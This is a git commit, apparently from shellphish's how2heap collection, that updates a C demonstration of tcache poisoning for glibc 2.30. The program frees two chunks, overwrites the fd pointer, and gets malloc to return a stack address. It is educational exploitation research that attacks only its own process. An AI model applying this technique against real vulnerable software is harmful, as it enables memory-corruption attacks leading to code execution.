make tcache_poisoning work in glibc-2.30

shellphish · May 6, 2020 · 68fa363 · 68fa363
1 parent 1f1423b
commit 68fa363
Showing 1 changed file with 27 additions and 16 deletions.
diff --git a/glibc_2.26/tcache_poisoning.c b/glibc_2.26/tcache_poisoning.c
@@ -4,30 +4,41 @@
 
 int main()
 {
-	fprintf(stderr, "This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
-	       "returning a pointer to an arbitrary location (in this case, the stack).\n"
-	       "The attack is very similar to fastbin corruption attack.\n\n");
+	// disable buffering
+	setbuf(stdin, NULL);
+	setbuf(stdout, NULL);
+
+	printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
+		   "returning a pointer to an arbitrary location (in this case, the stack).\n"
+		   "The attack is very similar to fastbin corruption attack.\n");
+	printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
+		   "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");
 
 	size_t stack_var;
-	fprintf(stderr, "The address we want malloc() to return is %p.\n", (char *)&stack_var);
+	printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);
 
-	fprintf(stderr, "Allocating 1 buffer.\n");
+	printf("Allocating 2 buffers.\n");
 	intptr_t *a = malloc(128);
-	fprintf(stderr, "malloc(128): %p\n", a);
-	fprintf(stderr, "Freeing the buffer...\n");
+	printf("malloc(128): %p\n", a);
+	intptr_t *b = malloc(128);
+	printf("malloc(128): %p\n", b);
+
+	printf("Freeing the buffers...\n");
 	free(a);
+	free(b);
 
-	fprintf(stderr, "Now the tcache list has [ %p ].\n", a);
-	fprintf(stderr, "We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
-		"to point to the location to control (%p).\n", sizeof(intptr_t), a, &stack_var);
-	a[0] = (intptr_t)&stack_var;
+	printf("Now the tcache list has [ %p -> %p ].\n", b, a);
+	printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
+		   "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);
+	b[0] = (intptr_t)&stack_var;
+	printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);
 
-	fprintf(stderr, "1st malloc(128): %p\n", malloc(128));
-	fprintf(stderr, "Now the tcache list has [ %p ].\n", &stack_var);
+	printf("1st malloc(128): %p\n", malloc(128));
+	printf("Now the tcache list has [ %p ].\n", &stack_var);
 
-	intptr_t *b = malloc(128);
-	fprintf(stderr, "2nd malloc(128): %p\n", b);
-	fprintf(stderr, "We got the control\n");
+	intptr_t *c = malloc(128);
+	printf("2nd malloc(128): %p\n", c);
+	printf("We got the control\n");
 
 	return 0;
 }